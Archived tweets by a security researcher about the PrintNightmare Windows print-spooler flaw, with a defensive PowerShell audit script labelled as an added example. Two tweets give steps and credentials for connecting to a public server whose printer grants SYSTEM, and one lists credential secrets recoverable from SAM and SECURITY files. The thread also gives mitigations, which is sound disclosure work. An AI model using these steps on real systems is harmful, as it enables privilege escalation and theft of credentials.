🥝🏳️‍🌈 Benjamin Delpy
A kiwi coding mimikatz & kekeo github: https://t.co/eS3LVgU6i0 Head of security services @banquedefrance Tweets are my own and not the views of my employer
Jul 27, 2021
Little #printnightmare (ep 4.3) upgrade : user-to-system as a service🥝
> Open SYSTEM prompt

connect to \\printnightmare[.]gentilkiwi[.]com (remove [ ]) with
- user: .\gentilguest
- password: password

Open 'Kiwi Legit Printer - x64', enjoy SYSTEM
(just one printer this time🤪)

Of course, video quality: video.twimg.com/tweet_video/E7…
Jul 20, 2021
Q: what can you do when you have #mimikatz🥝 & some Read access on Windows system files like SYSTEM, SAM and SECURITY?

A: Local Privilege Escalation 🥳

Thank you @jonasLyk for this Read access on default Windows😘

Oh, and this is not only SAM, but also SYSTEM & SECURITY.
So you can find "interesting" data, like:
- default windows install password (can be valid, trust me 👍)
- DPAPI computer keys (decrypt all computer private keys, etc.)
- Computer Machine account (silver ticket)
- ...
Jul 17, 2021
Want to test #printnightmare (ep 4.x) user-to-system as a service?🥝
(POC only, will write a log file to system32)

connect to \\printnightmare.gentilkiwi.com with
- user: .\gentilguest
- password: password

Open 'Kiwi Legit Printer - x64', then 'Kiwi Legit Printer - x64 (another one)'

You can prevent this behavior by setting some parameters/GPO:

'Package Point and print - Approved servers'
> docs.microsoft.com/troubleshoot/w…
> admx.help/?Category=Wind…

Of course, disable outbound access to CIFS/SMB/RPC...
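
An audit of the 'Package Point and print - Approved servers' setting mentioned above, as an added example that is not part of the original tweets. The function name is hypothetical, and the registry key and value names are assumed to be the ones this GPO writes; confirm them against the linked Microsoft documentation.

```powershell
# Added example (not from the original thread): report whether the
# 'Package Point and print - Approved servers' policy is configured locally.
# Assumption: the GPO writes the key and value names used below.
function Get-PackagePointAndPrintPolicy {
    [CmdletBinding()]
    param(
        [string]$PolicyKey = 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint'
    )

    $result = [ordered]@{
        PolicyKeyPresent   = Test-Path -LiteralPath $PolicyKey
        ApprovedListActive = $false
        ApprovedServers    = @()
        Findings           = @()
    }

    if ($result.PolicyKeyPresent) {
        # DWORD 1 means the approved-servers list is enforced.
        $props = Get-ItemProperty -LiteralPath $PolicyKey -ErrorAction SilentlyContinue
        $result.ApprovedListActive = ($props.PackagePointAndPrintServerList -eq 1)

        # Each approved server is stored as a string value under ListofServers.
        $listKey = Join-Path $PolicyKey 'ListofServers'
        if (Test-Path -LiteralPath $listKey) {
            $key = Get-Item -LiteralPath $listKey
            $result.ApprovedServers = @(
                $key.GetValueNames() |
                    ForEach-Object { $key.GetValue($_) } |
                    Where-Object { $_ }
            )
        }
    }

    if (-not $result.ApprovedListActive) {
        $result.Findings += 'Approved-servers policy is not enabled on this host.'
    } elseif ($result.ApprovedServers.Count -eq 0) {
        $result.Findings += 'Policy is enabled but no approved servers are listed.'
    }

    [pscustomobject]$result
}

Get-PackagePointAndPrintPolicy | Format-List
```

Run it on a sample of workstations and servers after the GPO has been linked; any host that reports a finding has not received the setting.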
Jun 30, 2021
This #printnightmare / CVE-2021-1675 is really serious 🤪

Just adapted/simplified original POC then:
*From Remote standard user to SYSTEM*

Here on a domain controller, but valid on all systems with RPC to spooler available, remote or local

➡️ disable service now (no patch yet)

As usual, video quality: video.twimg.com/tweet_video/E5…